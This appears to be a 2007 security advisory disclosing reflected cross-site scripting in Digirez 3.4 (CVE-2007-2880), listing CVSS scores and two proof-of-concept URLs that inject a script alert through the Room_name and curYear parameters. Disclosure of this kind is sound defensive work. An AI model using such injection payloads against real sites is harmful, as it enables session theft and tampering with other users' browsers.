Bug: Multiple XSS in Digirez ( Ascii Version )

Search:
WLB2

Multiple XSS in Digirez

Published
Credit
Risk
2007.05.31
Linux_Drox
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2007-2880
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
4.3/10
2.9/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
None
Partial
None

Hello
Vulnerable : Digirez
Version: 3.4
web : http://www.digiappz.com

XSS :
1-
http://www.example.com/room/info_book.asp?Room_name=[XSS]
2-
http://www.example.com/room/week.asp?curYear=[XSS]

For Example u can put :
1-
http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);<
/script>
2-
http://www.example.com/room/week.asp?curYear='><script>alert(1);</script
>

Discovered By Linux_Drox
www.LeZr.Com

Best regards ,,

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version